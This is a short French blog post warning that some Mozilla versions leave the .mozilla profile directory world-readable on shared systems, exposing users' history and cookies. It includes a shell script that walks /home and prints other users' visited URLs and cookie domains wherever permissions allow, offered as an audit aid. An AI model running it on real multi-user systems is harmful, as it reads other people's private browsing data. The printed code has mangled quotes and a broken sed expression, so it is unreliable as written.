Recemment, en me baladant sur un système utilisé par de nombreux utilisateurs, j’ai pu me rendre compte que certains softs créent leur répertoires avec par défaut des droits plutot dangereux … autorisant n’importe qui a en lire leur contenu. Ceci est d’autant plus idiot que nul n’a besoin de consulter ce répertoire purement applicatif !

Dans le présent cas, je me suis surtout penché sur mozilla, qui peut contenir des informations personnelles très pertinentes retraçant tous vos faits et gestes sur Internet ! Toutes les versions ne semblent pas se comporter de la même manière quant aux droits donnés au réprtoire .mozilla mais sur certaines, les droits RX sont bien donnés à tous. Dans ce cas, et pour peut que l’on puisse au moins traverser le répertoire home de l’utilisateur, il est simple de consulter son historique et la liste de ses cookies, informations qui peuvent être trés parlantes…

Il est donc à mon avis important de bien veilleer aux droits par défaut de certaines applications !!

Je vous livre un petit script d’analyse permettant de mettre en evidence ce problème éventuel : #!/bin/sh
liste=`ls -l /home/ | tr -s ” ” | cut -b 10- | grep ^x | cut -d ” ” -f 8 |column`
for user in $liste
do
file=”/home/$user/.mozilla/default”
if [ -d $file ] && [ -r $file ]; then
histo=`find $file -name “history.dat” 2> /dev/null`
cookie=`find $file -name “cookies.txt” 2> /dev/null`
echo $user :
if [ $histo != “” ] && [ -n $histo ] ; then
cat $histo | grep “=http://” | sed -e “s/=http://([^)]*)).*/1/”
fi
if [ $cookie != “” ] && [ -f $cookie ] ; then
cat $cookie | cut -f 1 | grep -v “^#”
fi
fi
done